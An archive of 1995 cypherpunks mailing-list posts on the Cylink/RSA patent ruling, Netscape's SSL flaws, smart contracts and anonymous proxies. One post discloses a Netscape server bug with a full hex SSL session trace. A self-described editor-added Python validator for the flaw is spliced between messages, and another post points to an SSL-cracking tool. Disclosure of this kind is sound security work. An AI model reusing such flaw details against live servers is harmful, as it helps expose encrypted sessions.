286-3376 Hammerhead Productions fax: 408) 292-8624 From andrew_loewenstern at il.us.swissbank.com Tue Sep 19 15:10:11 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 19 Sep 95 15:10:11 PDT Subject: Cylink Message-ID: <9509192145.AA01100@ch1d157nwk> anonymous claims the WSJ said: > The arbitrators ruled that RSA hasn't had the right to sublicense > the Stanford patents since 1990. 
> > Cylink said it would seek royalties from companies that have licensed > software code from RSA and are redistributing it, arguing that they > are infringing the Stanford patents. hahahaha, this is funny if it's true... Anyone know which two patents they are referring to? (diffie-hellman and merkle-hellman?) Any ideas on how this will change the legal status of RSAREF and PGP? andrew From bobw at netmanage.com Tue Sep 19 15:45:11 1995 From: bobw at netmanage.com (Bob Williams) Date: Tue, 19 Sep 95 15:45:11 PDT Subject: NetManage - Cylink Press Announcement Message-ID: There are quite a few open issues regarding the reliability, interoperability, and licensing of public key technology. All parties interested in access to code for testing and comment please respond to this email address. Thanks Bob ------------ NETMANAGE, Inc. Press Release FOR IMMEDIATE RELEASE Contact: Donna Loughlin, NetManage, (408) 973-7171 Donna at netmanage.com NetManage Licenses Public Key Cryptography from CYLINK The Two Firms to Promote an Open Interface for Internet Security which Corrects Flaws and Eliminates Financial and Interoperability Barriers for Cryptography. Cupertino, California - September 19, 1995- NetManage, the leader in TCP/IP Applications for Windows and Internet productivity software, announced today that it has signed a licensing agreement with CYLINK Corporation for technology which incorporates the fundamental patents covering public key cryptography. NetManage will be providing support for public key authentication and data encryption as a fundamental component of its Chameleon Enterprise strategy. The two firms further announced that they plan to provide support for an open interface for Internet security which will address recent flaws found in cryptographic implementations used by Netscape Communications and other unpublicized security holes in existing Internet security protocols. 
The standard is further intended to eliminate the financial and interoperability barriers that have been holding back widespread use of public key cryptography on the Internet. In a separate announcement released yesterday, CYLINK announced that it had prevailed in a patent lawsuit with RSA Data Security which found that RSA had infringed U.S. patents held by CYLINK which cover all known implementations of public key technology. About Internet Security ----------------------- Establishing a secure Internet connection requires any computer software program to perform two functions: Authentication of the user, and bulk encryption of data. The Authentication phase allows two computers to verify that each party is who they claim to be, and that they are authorized to enter into a secure communications session. This is done via 'public key' technology, which was developed and patented originally by Stanford University and licensed exclusively by CYLINK Corporation. During the authentication phase the two computers also agree upon the encryption method to be used for bulk data transfer during the time the two computers are communicating data between one another. These ciphers can be implemented in either software or hardware, including PCMCIA cards. Popular encryption ciphers include DES, Triple-DES, SAFER, IDEA, Skipjack, RC-2 and RC-4 and are available from a variety of software and hardware vendors. Limitations of Current Internet Security Standards -------------------------------------------------- Current implementations of security protocols proposed as standards by Netscape Communications and RSA Data Security, Inc. include security flaws and fail to fully accommodate open and interoperable secure communications between computers which use different bulk encryption ciphers. 
These problems have limited the adoption of Internet security as a widespread interoperable feature of all Internet software and hardware products including end-user applications, servers, firewalls, and secure routers. NetManage and CYLINK, along with other major software and hardware developers, will be announcing next week the release of a publicly available security implementation which allows for "plug & play" interoperability for users of Internet security, and the endorsement of protocol extensions which improve the reliability of current proposed Internet security standards. This open implementation will not lock software or hardware developers into the use of encryption technology from any one vendor. Related APIs, key exchange technology, and encryption will be made publicly available to other software and hardware developers. Licensing will include source code and no per-copy royalty fees. About NetManage --------------- NetManage Inc., the fastest growing software company in the United States, develops, markets and supports an integrated set of Internet-based applications, servers and development tools for Microsoft Windows, Windows 95 and Windows NT. NetManage software allows corporations to facilitate communication, sharing of information and collaboration between workgroups using Internet technology. The company's award winning products include Chameleon, Internet Chameleon and ECCO. NetManage is a public company, whose shares are traded on the NASDAQ under the ticker symbol NETM. Its products are sold world-wide by NetManage's direct sales force and authorized channel partners. About CYLINK ------------ CYLINK Corporation is the world's largest provider of enterprise-wide network information security products and wireless communications. 
CYLINK is the exclusive holder of the fundamental patents which broadly claim the invention of public-key cryptography (Diffie-Hellman, Hellman-Merkle, and Hellman-Pohlig) and which were originally developed at Stanford University. Headquartered in Sunnyvale, California, CYLINK serves Fortune 500 companies, financial institutions and government agencies. Licensees of CYLINK technology include CISCO Systems, and other prominent hardware and software developers. # # # From AndrewR at beetle.vironix.co.za Tue Sep 19 15:45:31 1995 From: AndrewR at beetle.vironix.co.za (Andrew Roos) Date: Tue, 19 Sep 95 15:45:31 PDT Subject: A Netscape Server implementation error Message-ID: <305F486F@beetle.vironix.co.za> Hi Sameer Thanks in advance for the T-shirt, and I like the Web site. On the subject of Netscape implementation errors, I note that the SSL protocol specification states in section 5.6.1 (CLIENT-MASTER-KEY) that "It is also an error if CLEAR-KEY-LENGTH is non-zero and the CIPHER-KIND is not an export cipher". However, I note that Netscape Commerce Server 1.1 will happily accept a "secure" connection using the non-export cipher SSL_CK_RC4_128_WITH_MD5, even if the CLEAR-KEY-LENGTH is set to 16 and the *entire* master key is sent unencrypted. 
Here is an extract from an SSL session with www.netscape.com which illustrates the oversight:

------------------------------- Start of Session ---------------------------

(1) The session was initialised as normal, and the following values were exchanged in the SERVER-HELLO and CLIENT-HELLO:

Challenge: a2 ff 2e 94 8d f9 f4 e2 2c f6 bd ae 7f 47 db 6c
Connection id: ef 47 3b 44 db d9 8d 1a f0 da 3e 14 73 97 a3 1f

(2) I then sent the following CLIENT-MASTER-KEY message, which is reproduced in full:

SSL Record Header: 80 9a
Message type: SSL_MT_CLIENT_MASTER_KEY 02
Cipher kind: SSL_CK_RC4_128_WITH_MD5 01 00 80
Clear key length: 16 00 10
Encrypted key length: 128 bytes 00 80
Key arg length: 0 00 00
Clear key data: the *entire* master key sent in the clear
af 24 2e e8 2b b1 75 d1 27 a2 b8 76 8b 49 c3 f3
Encrypted key: this is a zero-length block formatted using PKCS#1 block type 2 and encrypted under Netscape's public key. Since it contains no data, an eavesdropper would not need to decrypt it in order to decrypt the rest of the session.
af 24 2e e8 2b b1 75 d1 27 a2 b8 76 8b 49 c3 f3
9b 9b 0b ff cd e8 2f 2c 0d 16 4e 90 73 26 4e e7
e0 3f 45 8a ce 9a 21 d6 2a 6b b8 9a 20 4e bc cf
d0 01 36 86 1c db e0 8b a8 e3 4c 9b 15 11 ea 95
b1 50 3f c9 42 9a 97 77 0f 9d 29 97 7e 87 1b 8f
77 b6 c9 c6 53 90 5b 74 4c 92 99 62 ad 8b bf 4c
28 ac 1b 11 32 64 56 c9 f0 d5 6f c9 89 6b 55 3f
b9 42 aa 7b 7c f0 a1 89 93 22 13 46 e2 58 63 23
b2 51 83 92 76 46 05 65 87 86 5b 52 5a d1 02 ee

(3) I calculated the session keys in the normal manner, using the master key which was sent entirely in the clear.
The result was:

Client read key: 14 3e 84 a6 54 57 d6 51 94 cf 54 f5 5a 29 4a ef
Client write key: 9d e1 16 77 92 ee 89 f2 2d 30 c2 a2 e1 77 9f 5d

(4) Instead of disconnecting, the Netscape server sent the following reply (the header has been removed):

28 40 00 75 b8 d6 60 68 f5 cf ba 65 78 49 35 83
d3 3a b5 d3 81 23 2d f8 7d c6 f8 47 4d 0c 62 c3
b4

This was decrypted using the client read key to give the following SERVER_VERIFY message:

Message Authentication Code: 7b 95 2a 84 a1 55 fc 59 32 6b 53 ec e0 1d 80 4a
Message type: SSL_MT_SERVER_VERIFY 05
Challenge data (which agrees with the challenge sent in the CLIENT-HELLO): a2 ff 2e 94 8d f9 f4 e2 2c f6 bd ae 7f 47 db 6c

(5) The negotiation phase of the protocol was concluded with encrypted CLIENT-FINISHED and SERVER_FINISHED messages as per normal.

(6) I sent the encrypted HTTP command "GET / HTTP/1.0" and received the following text (after decryption, stripping MAC and header, etc.):

HTTP/1.0 200 OK
Server: Netscape-Commerce/1.1
Date: Tuesday, 19-Sep-95 21:15:23 GMT
Last-modified: Tuesday, 19-Sep-95 21:14:09 GMT
Content-length: 5278
Content-type: text/html

Followed by the Netscape home page, which included the following statement: Find out how Netscape is responding immediately to upgrade customers and minimize risk of future threats.

(7) Having obtained the warm, fuzzy feeling I so desired, I closed the connection secure in the knowledge that my secrets were safe with Netscape.

-------------------------------- End of Session -----------------------------

This shows that Commerce Server 1.1 is prepared to accept a "secure" connection which is completely insecure as the entire master key has been sent in the clear and an eavesdropper could decrypt the session without any cryptanalysis. This does not mean that sessions between "well-behaved" browsers and Netscape servers are insecure, since the browser will send all 16 bytes of the key encrypted. 
Neither could it be used for an active attack, since if a new master was substituted for the one sent by the client, this would be detected during authentication of the SERVER-VERIFY message. However, it would provide an opportunity for a malicious browser supplier to "doctor" secure browsers so that they sent all (or part) of the master key in the clear, even when using non-export ciphers. (Of course there are better ways to do this; the "random padding" of PKCS block type 2 comes to mind). Although this is not nearly as important a result as Ian and David's, it is the first server hack, so can I have another T shirt? :-) Andrew ________________________________________________________________ Andrew Roos // C++ programmers have class (but not much inheritance) PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26 Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos From sameer at c2.org Tue Sep 19 16:09:49 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 16:09:49 PDT Subject: netscape's response Message-ID: <199509192304.QAA05546@infinity.c2.org> " With this knowledge, an experienced computer programmer could decrypt messages sent by Netscape Navigator to other computers in a few hours of computation time." Excuse me? A few hours? Try 25 seconds?? "Netscape has also begun to engage an external group of world-class security experts who will review our solution to this problem before it is sent to customers." A group which offered to review the first version, but Netscape refused. From their release it looks like they aren't finding a better source of entropy, but just using *more* sources of entropy. Doesn't mean that the entropy is good. A T-shirt to the first person to decompile the new Seed code and post the sources of "entropy" used. 
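The check Andrew Roos's message above says Commerce Server 1.1 skips (SSL 2.0 section 5.6.1 on CLEAR-KEY-LENGTH) is a few lines of validation on the parsed CLIENT-MASTER-KEY message. The block below is an added example written for this page: it is not Netscape's server code and not part of any message in this thread. The 3-byte cipher-kind codes are the values from the SSL 2.0 specification (the page's own trace shows 01 00 80 for SSL_CK_RC4_128_WITH_MD5); the 16 clear-key bytes and the 80 9a record header are taken from the trace, while the 128-byte encrypted-key field is a constructed placeholder, since the check never reads it.

```python
import struct

# Editor-added check for the SSL 2.0 CLIENT-MASTER-KEY condition discussed
# above: a server must reject a non-export cipher whose CLEAR-KEY-LENGTH is
# non-zero, because every clear byte is a master-key byte handed to any
# eavesdropper. Demonstration parser written for this page, not Netscape's
# server. Cipher-kind codes are the 3-byte values from the SSL 2.0 spec;
# the second column is the cipher's master-key length in bytes.

SSL_MT_CLIENT_MASTER_KEY = 0x02

CIPHER_KINDS = {   # cipher kind -> (name, master key bytes, is_export)
    b"\x01\x00\x80": ("SSL_CK_RC4_128_WITH_MD5", 16, False),
    b"\x02\x00\x80": ("SSL_CK_RC4_128_EXPORT40_WITH_MD5", 16, True),
    b"\x03\x00\x80": ("SSL_CK_RC2_128_CBC_WITH_MD5", 16, False),
    b"\x04\x00\x80": ("SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5", 16, True),
    b"\x05\x00\x80": ("SSL_CK_IDEA_128_CBC_WITH_MD5", 16, False),
    b"\x06\x00\x40": ("SSL_CK_DES_64_CBC_WITH_MD5", 8, False),
    b"\x07\x00\xc0": ("SSL_CK_DES_192_EDE3_CBC_WITH_MD5", 24, False),
}
EXPORT_SECRET_BYTES = 5   # export ciphers keep only 40 bits of master key encrypted


class SSLError(Exception):
    pass


def parse_client_master_key(record: bytes) -> dict:
    """Parse an SSLv2 record (2-byte header) carrying CLIENT-MASTER-KEY."""
    if len(record) < 2 or not record[0] & 0x80:
        raise SSLError("expected a 2-byte record header")
    length = ((record[0] & 0x7f) << 8) | record[1]
    body = record[2:]
    if len(body) != length:
        raise SSLError("record length %d does not match body of %d bytes" % (length, len(body)))
    if len(body) < 10 or body[0] != SSL_MT_CLIENT_MASTER_KEY:
        raise SSLError("not a CLIENT-MASTER-KEY message")
    kind = body[1:4]
    clear_len, enc_len, arg_len = struct.unpack(">HHH", body[4:10])
    rest = body[10:]
    if len(rest) != clear_len + enc_len + arg_len:
        raise SSLError("length fields do not add up")
    return {
        "cipher_kind": kind,
        "clear_key": rest[:clear_len],
        "encrypted_key": rest[clear_len:clear_len + enc_len],
        "key_arg": rest[clear_len + enc_len:],
    }


def check_clear_key_policy(msg: dict) -> str:
    """Section 5.6.1: non-export ciphers carry no clear key bytes at all;
    export ciphers carry exactly KEY-LENGTH - 5 of them. Returns the cipher
    name on success, raises SSLError otherwise. (KEY-ARG is not checked.)"""
    kind = msg["cipher_kind"]
    if kind not in CIPHER_KINDS:
        raise SSLError("unknown CIPHER-KIND %s" % kind.hex())
    name, key_len, is_export = CIPHER_KINDS[kind]
    clear_len = len(msg["clear_key"])
    if not is_export:
        if clear_len != 0:
            raise SSLError("%s: CLEAR-KEY-LENGTH %d must be 0 for a non-export cipher"
                           % (name, clear_len))
    elif clear_len != key_len - EXPORT_SECRET_BYTES:
        raise SSLError("%s: CLEAR-KEY-LENGTH %d must be %d for an export cipher"
                       % (name, clear_len, key_len - EXPORT_SECRET_BYTES))
    return name


def build_client_master_key(kind: bytes, clear_key: bytes, encrypted_key: bytes,
                            key_arg: bytes = b"") -> bytes:
    """Encode a CLIENT-MASTER-KEY record, used to reproduce the trace above."""
    body = (bytes([SSL_MT_CLIENT_MASTER_KEY]) + kind
            + struct.pack(">HHH", len(clear_key), len(encrypted_key), len(key_arg))
            + clear_key + encrypted_key + key_arg)
    return struct.pack(">H", 0x8000 | len(body)) + body


# The message from the trace: RC4-128 (non-export) with all 16 master-key
# bytes in CLEAR-KEY-DATA. The 128-byte RSA block is a constructed placeholder.
ROOS_CLEAR_KEY = bytes.fromhex("af242ee82bb175d127a2b8768b49c3f3")
ROOS_MESSAGE = build_client_master_key(b"\x01\x00\x80", ROOS_CLEAR_KEY, b"\x00" * 128)


def server_accepts(record: bytes) -> bool:
    """What a conforming server should answer: True means continue the handshake."""
    try:
        check_clear_key_policy(parse_client_master_key(record))
        return True
    except SSLError:
        return False
```

`server_accepts(ROOS_MESSAGE)` is False, which is the answer Commerce Server 1.1 should have given; the same builder with an empty clear key passes, and an export cipher passes only with exactly 11 clear bytes. A conforming server should also refuse any CIPHER-KIND it did not offer in its own SERVER-HELLO, which this check leaves to the caller.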
(See http://www.c2.org/hacknetscape for general [not written in stone] guidelines regarding t-shirt awards)

--
sameer                                   Voice: 510-601-9777
Community ConneXion                      FAX:   510-601-9734
An Internet Privacy Provider             Dialin: 510-658-6376
http://www.c2.org (or login as "guest")  sameer at c2.org

From yusuf921 at uidaho.edu Tue Sep 19 16:36:28 1995
From: yusuf921 at uidaho.edu (Syed Yusuf)
Date: Tue, 19 Sep 95 16:36:28 PDT
Subject: Unabomber ?
In-Reply-To: <199509191330.JAA13584@pipe4.nyc.pipeline.com>
Message-ID:

On Tue, 19 Sep 1995, John Young wrote:

> I'm scanning it now and will offer it in a while -- it's a
> long, long pole.
>
> I'll ask by this post if someone wants to offer it FTP, I can
> only do multiple e-mail bites from this hole.

I'm willing to put it on my home page

--
Syed Yusuf | http://www.uidaho.edu/~yusuf921
Keep me away from Wisdom that does not Cry, Philosophy that does not Laugh, and Greatness that does not bow before Children --Kahlil Gibran

From liberty at gate.net Tue Sep 19 16:46:58 1995
From: liberty at gate.net (Jim Ray)
Date: Tue, 19 Sep 95 16:46:58 PDT
Subject: NSA and Netscape Crack
Message-ID: <199509192342.TAA25539@tequesta.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----

Tim wrote:
>> If the "flaws" are being found by our group, as John notes, just what is
>> the NSA doing in the _second_ role it is supposed to have, it's "COMSEC,"
>> or communications security, role?

and then Thomas wrote:
>Gee Tim, NSA is "helping" us out by creating Clipper and new key escrow
>mechanisms ;)
>
>"I'm from the NSA, I'm here to help your crypto..."

In the relatively short time I've been on this list, Cypherpunks have bruted, and then found a weakness in, two kinds of Netscape software. [A fine public service, IMO. Congrats to all involved.] I don't expect to know NSA's specific brute-force capability, but does anyone know if the NSA has *ever* found a glaring weakness in software and then told its author(s) or owner(s) about it?
Do "we" perform the "COMSEC" role Tim was speaking of better than the NSA?

JMR

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMF9VHW1lp8bpvW01AQFZkwQAiQWJMfdP+5v0CozYH59ZGWUhpaKxgX15
vdVCdSzHgaN6sj5aLVL4yRI0bkVe/6nJ8I4Nj9cYS5K5AgbcmiRDLvEulc0Y+mwr
B9rQBUcX7hM6lA+tEk2UpiGmR1xdh2U0Qpu93zT8T7MZtIc5dRReKeT21OXl4W96
NX4iONaceGY=
=2nmI
-----END PGP SIGNATURE-----

Regards, Jim Ray

"Censorship reflects society's lack of confidence in itself. It is a hallmark of an authoritative regime." -- Justice Potter Stewart
-----------------------------------------------------------------------
PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
Key id. # E9BD6D35  James Milton Ray
-----------------------------------------------------------------------
Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________

From sameer at c2.org Tue Sep 19 17:07:59 1995
From: sameer at c2.org (sameer)
Date: Tue, 19 Sep 95 17:07:59 PDT
Subject: http://www.c2.org/hacknetscape/critique.phtml
Message-ID: <199509200002.RAA10459@infinity.c2.org>

My response to netscape's press release.

--
sameer                                   Voice: 510-601-9777
Community ConneXion                      FAX:   510-601-9734
An Internet Privacy Provider             Dialin: 510-658-6376
http://www.c2.org (or login as "guest")  sameer at c2.org

From szabo at netcom.com Tue Sep 19 17:11:55 1995
From: szabo at netcom.com (Nick Szabo)
Date: Tue, 19 Sep 95 17:11:55 PDT
Subject: Crypto + Economics + AI = Digital Money Economies
In-Reply-To:
Message-ID: <199509192326.QAA12334@netcom.netcom.com>

I wholeheartedly agree with Tim that economics should play an important role in analyzing cryptographic protocols. It lets us step back and ask what features are important, and in general what we are trying to accomplish: usually something very different than the military uses of cryptography that have given rise to the current methodologies.
To economics, especially game theory, I add a vast body of knowledge about human relationships, especially those involving commerce, that civilization has accumulated over the years: law, especially business law.

If we step back and look at what many cypherpunks are trying to achieve, a major idealistic theme is a Gandhian cyberspace where violence can only be make-believe, whether in Mortal Kombat or "flame wars". Cypherpunks want our telephone networks, Internet businesses, etc. to be both protected from force, and not dependent on force for their existence. Our 20th century information commerce systems, from publishing to credit cards, have often been very dependent on the threat of violence, usually law enforcement, to protect intellectual property rights, deter fraud, collect debts, etc. There is no utopia in sight where such threats can be completely eliminated, but we can recognize that they exist and carefully work to reduce our dependence on them.

In a far more practical vein, the dawn of international commercial networks that criss-cross hundreds of jurisdictions with complex, obscure, and often contradictory regulations gives rise to a vast market opportunity for substituting, where possible, network security mechanisms for law enforcement dependencies. The recent discoveries in cryptographic protocols provide us with a rich toolbox for solving these problems.

Perhaps the most fundamental building block of business law is the contract. Strongly related to Tim's ontology of money is an area I have developed quite extensively called _smart contracts_. The terms of contractual relationships can often be formalized and standardized, and then performed via network-based protocols. These protocols, along with economic incentives, protect the performance of the contract from both fraud by the principals and attack from third parties.
This is also the basic task of law enforcement in commercial law; thus smart contracts, when successful, reduce dependence on law enforcement as well as losses to fraud and cracking. Of special interest to cryptologists is that the principles of contract provide us with a methodology for the use of cryptography that is very different from, and potentially far more lucrative than, the traditional military paradigm.

I have much more to say about these things in my essays under http://www.digicash.com/~nick/, and in a forthcoming article for _Extropy_.

Nick Szabo
szabo at netcom.com

From aleph1 at dfw.net Tue Sep 19 17:33:44 1995
From: aleph1 at dfw.net (Aleph One)
Date: Tue, 19 Sep 95 17:33:44 PDT
Subject: New Kid On The Block
Message-ID:

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

---------- Forwarded message ----------
Date: Tue, 19 Sep 95 14:25:20 PDT
From: Bob Williams
To: "Larry J. Hughes Jr." , Adam Shostack
Cc: ssl-talk at netscape.com
Subject: Re: details on security bug?

The problems with SSL extend beyond the random number generation hole widely publicized in the press today. SSL 2.0 poses both financial and interoperability barriers to widespread use of Cryptography that will be addressed in the very near future.

-------------------------------
NETMANAGE, Inc. Press Release
FOR IMMEDIATE RELEASE

Contact: Donna Loughlin, NetManage, (408) 973-7171
Donna at netmanage.com

NetManage Licenses Public Key Cryptography from CYLINK

The Two Firms to Promote an Open Interface for Internet Security which Corrects Flaws and Eliminates Financial and Interoperability Barriers for Cryptography.
Cupertino, California - September 19, 1995 - NetManage, the leader in TCP/IP Applications for Windows and Internet productivity software, announced today that it has signed a licensing agreement with CYLINK Corporation for technology which incorporates the fundamental patents covering public key cryptography. NetManage will be providing support for public key authentication and data encryption as a fundamental component of its Chameleon Enterprise strategy.

The two firms further announced that they plan to provide support for an open interface for Internet security which will address recent flaws found in cryptographic implementations used by Netscape Communications and other unpublicized security holes in existing Internet security protocols. The standard is further intended to eliminate the financial and interoperability barriers that have been holding back widespread use of public key cryptography on the Internet.

In a separate announcement released yesterday, CYLINK announced that it had prevailed in a patent lawsuit with RSA Data Security which found that RSA had infringed U.S. patents held by CYLINK which cover all known implementations of public key technology.

About Internet Security
-----------------------

Establishing a secure Internet connection requires any computer software program to perform two functions: Authentication of the user, and bulk encryption of data. The Authentication phase allows two computers to verify that each party is who they claim to be, and that they are authorized to enter into a secure communications session. This is done via "public key" technology, which was developed and patented originally by Stanford University and licensed exclusively by CYLINK Corporation. During the authentication phase the two computers also agree upon the encryption method to be used for bulk data transfer during the time the two computers are communicating data between one another.
These ciphers can be implemented in either software or hardware, including PCMCIA cards. Popular encryption ciphers include DES, Triple-DES, SAFER, IDEA, Skipjack, RC-2 and RC-4 and are available from a variety of software and hardware vendors.

Limitations of Current Internet Security Standards
--------------------------------------------------

Current implementations of security protocols proposed as standards by Netscape Communications and RSA Data Security, Inc. include security flaws and fail to fully accommodate open and interoperable secure communications between computers which use different bulk encryption ciphers. These problems have limited the adoption of Internet security as a widespread interoperable feature of all Internet software and hardware products including end-user applications, servers, firewalls, and secure routers.

NetManage and CYLINK, along with other major software and hardware developers, will be announcing next week the release of a publicly available security implementation which allows for "plug & play" interoperability for users of Internet security, and the endorsement of protocol extensions which improve the reliability of current proposed Internet security standards. This open implementation will not lock software or hardware developers into the use of encryption technology from any one vendor. Related APIs, key exchange technology, and encryption will be made publicly available to other software and hardware developers. Licensing will include source code and no per-copy royalty fees.

About NetManage
---------------

NetManage Inc., the fastest growing software company in the United States, develops, markets and supports an integrated set of Internet-based applications, servers and development tools for Microsoft Windows, Windows 95 and Windows NT. NetManage software allows corporations to facilitate communication, sharing of information and collaboration between workgroups using Internet technology.
The company's award winning products include Chameleon, Internet Chameleon and ECCO. NetManage is a public company, whose shares are traded on the NASDAQ under the ticker symbol NETM. Its products are sold world-wide by NetManage's direct sales force and authorized channel partners.

About CYLINK
------------

CYLINK Corporation is the world's largest provider of enterprise-wide network information security products and wireless communications. CYLINK is the exclusive holder of the fundamental patents which broadly claim the invention of public-key cryptography (Diffie-Hellman, Hellman-Merkle, and Hellman-Pohlig) and which were originally developed at Stanford University. Headquartered in Sunnyvale, California, CYLINK serves Fortune 500 companies, financial institutions and government agencies. Licensees of CYLINK technology include CISCO Systems, and other prominent hardware and software developers.

# # #

From tfs at vampire.science.gmu.edu Tue Sep 19 17:37:33 1995
From: tfs at vampire.science.gmu.edu (Tim Scanlon)
Date: Tue, 19 Sep 95 17:37:33 PDT
Subject: ftp://www.brooks.af.mil/pub/unix/utils/des.tar
In-Reply-To: <9509191440.AA18495@tis.com>
Message-ID: <9509200037.AA01721@vampire.science.gmu.edu>

I can second that notion. There are a good many people in all sorts of sectors of the government who can easily be brought to frothing over Mr. Freeh & his pals at the NSA's position on weak security systems. They like weakness, and anyone with two brain cells to rub together who's interested in good security rather rapidly ends up coming to the conclusion that the FBI and the NSA aren't doing them any real favors. Basically IMHO, Tim May called it right when he said they're more interested in snooping than securing. I've believed that for a long, long time now. It still manages to annoy me seriously whenever I think about it.
The vulnerabilities that most military systems suffer from are both staggering and frightening, and it is criminal that the NSA has so seriously abrogated its security role in the public and private sectors. I personally believe it's going to take a rather massive info-terrorist attack before the control-freak crowd that's driving weak security takes a back seat. Worms from Libyan programmers anyone?

Strong cryptographic systems are an integral part of strong security systems. The recent netscape crack shows why you can't have one without the other pretty well. If good security means ceding some perceived control over your populace, you should probably be examining whether your populace wanted you to control them in the first place, it seems to me. Unfortunately the anti-security crowd is firmly in control of the organs of the government, and does a damn good job spreading its propaganda to dupes in the press. Stuff like the recent kneejerk "CyberPorn" crap and governmental actions & reactions in that area towards limiting civil liberties and security technology are great examples of it.

Meanwhile, I think the US is starting to slip behind the curve in software technology for encryption & the like... This will probably prove interesting in the future, especially if the CPU tossed at key escrow & the like turns up more surprises.

Tim Scanlon
________________________________________________________________
tfs at vampire.science.gmu.edu (NeXTmail, MIME)   Tim Scanlon
George Mason University (PGP key avail.)         Public Affairs
I speak for myself, but often claim demonic possession

From sameer at c2.org Tue Sep 19 17:40:50 1995
From: sameer at c2.org (sameer)
Date: Tue, 19 Sep 95 17:40:50 PDT
Subject: A Netscape Server implementation error
In-Reply-To: <305F486F@beetle.vironix.co.za>
Message-ID: <199509200035.RAA13361@infinity.c2.org>

>
> Hi Sameer
>
> Thanks in advance for the T-shirt, and I like the Web site. On the

My pleasure.
;-)

> Although this is not nearly as important a result as Ian and Davids, it
> is the first server hack, so can I have another T shirt? :-)

But you're already getting a T-shirt. (This looks like a place where a 'nym could come in handy ;-)

I've done a little bit more in terms of outlining the requirements to win a t-shirt on the web page-- actual working code is an important criterion.

--
sameer                                   Voice: 510-601-9777
Community ConneXion                      FAX:   510-601-9734
An Internet Privacy Provider             Dialin: 510-658-6376
http://www.c2.org (or login as "guest")  sameer at c2.org

From anon-remailer at utopia.hacktic.nl Tue Sep 19 17:45:12 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Tue, 19 Sep 95 17:45:12 PDT
Subject: unssl.c available for ftp (was: Netscape's random numbers)
In-Reply-To: <199509190006.RAA28102@infinity.c2.org>
Message-ID: <199509200045.CAA12207@utopia.hacktic.nl>

> Please do not export.

ftp://utopia.hacktic.nl/pub/incoming

From standing.turtle at internetmci.com Tue Sep 19 17:50:37 1995
From: standing.turtle at internetmci.com (Standing Turtle)
Date: Tue, 19 Sep 95 17:50:37 PDT
Subject: Public Key Partners Dissolved!!!!!
Message-ID: <01HVH2IN4TDE8WWXN7@MAILSRV1.PCY.MCI.NET>

CYLINK CLAIMS SHARE OF RSA TECHNOLOGY

An arbitration ruling has awarded Cylink Corp. control over two Stanford University patents on public-key encryption technology used by RSA Data Security Inc. following the dissolution of the companies' five-year partnership. Cylink says it plans to seek royalties from companies that have licensed the software code from RSA and are redistributing it. The arbitrators ruled that RSA's right to sublicense the software expired in 1990.
(Wall Street Journal 19 Sep 95 B7)

From somogyi at digmedia.com Tue Sep 19 17:52:35 1995
From: somogyi at digmedia.com (Stephan Somogyi)
Date: Tue, 19 Sep 95 17:52:35 PDT
Subject: Netscape on randseed issue
Message-ID:

Netscape has put up an official response to the randseed issue:

Most interesting to me was the para:

"Netscape has also begun to engage an external group of world-class security experts who will review our solution to this problem before it is sent to customers. These experts will validate Netscape's solution and insure that it is complete and effective in solving this vulnerability. The group will be used on an ongoing basis to work with Netscape's internal security experts to review the design and implementation of security in Netscape's products and to provide an additional measure of assurance that these products implement the highest levels of security possible."

Anyone know anything about this group, or is this a reference to the RSADSI source review that Andrew Loewenstern mentioned earlier today?

________________________________________________________________________
Stephan Somogyi
Think Tank Grenadier
Digital Media

From froomkin at law.miami.edu Tue Sep 19 18:14:07 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Tue, 19 Sep 95 18:14:07 PDT
Subject: Change of address {No crypto content}
Message-ID:

Just to announce that I have a new address. No more VAX/VMS, hello Unix. Donations of nice procmail files, and unix hints for the re-clueless (I last had an account on a Unix machine in 1980), most welcome.

If you send me mail in the next few days and I don't reply, it's either because I fiddled wrong, or because I couldn't find a terminal in Pittsburg.

A. Michael Froomkin          | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law   | PLEASE NOTE NEW E-MAIL:
U. Miami School of Law       | froomkin at law.miami.edu
P.O. Box 248087              |
Coral Gables, FL 33124 USA   | It's hot here.
A HOME AT LAST: http://viper.law.miami.edu/~froomkin

From dr261 at cleveland.Freenet.Edu Tue Sep 19 18:53:47 1995
From: dr261 at cleveland.Freenet.Edu (Tobin T Fricke)
Date: Tue, 19 Sep 95 18:53:47 PDT
Subject: Stand up and be heard!
Message-ID: <199509200153.VAA09233@kanga.INS.CWRU.Edu>

Yes, I'm still working on a magazine, I still need authors! Write about cryptography and coverups and clipper and whatever else you find interesting, and write about it! Become rich and famous! (although the rich and famous part won't be a result of writing for TCW...) I also need reporters to write blurbs about things that happen. If interested, mail me privately at dr261 at cleveland.freenet.edu, not on the list.

--
Tobin Fricke (aka LightRay)
The Digital Forest BBS (714)586-6142
dr261 at kanga.ins.cwru.edu
KE6WHF Amateur Radio, 1:103/925 fido

From jcaldwel at iquest.net Tue Sep 19 19:07:17 1995
From: jcaldwel at iquest.net (James Caldwell)
Date: Tue, 19 Sep 95 19:07:17 PDT
Subject: Anonymous WWW proxies
Message-ID:

On 17 Sep 95 at 11:24, Aleph One wrote:

> Points taken. But I believe there are (or will be) patches for CERN to
> do SSL. Check the SSLeay ssl-user mailing list.

> While we talking about anonymous proxies. I always wanted to set up
> an IP anonymous proxy using Linux IP tunnel and maybe also IP
> Masquerading. This would allow people to have anonymous Web Servers,
> etc. (But as anything it would probably be abused for hacking, etc
> at no end). Any comments?

You can add a bit of protection for yourself to this, just some way of preventing the unwanted from using the service and terminating abusers.
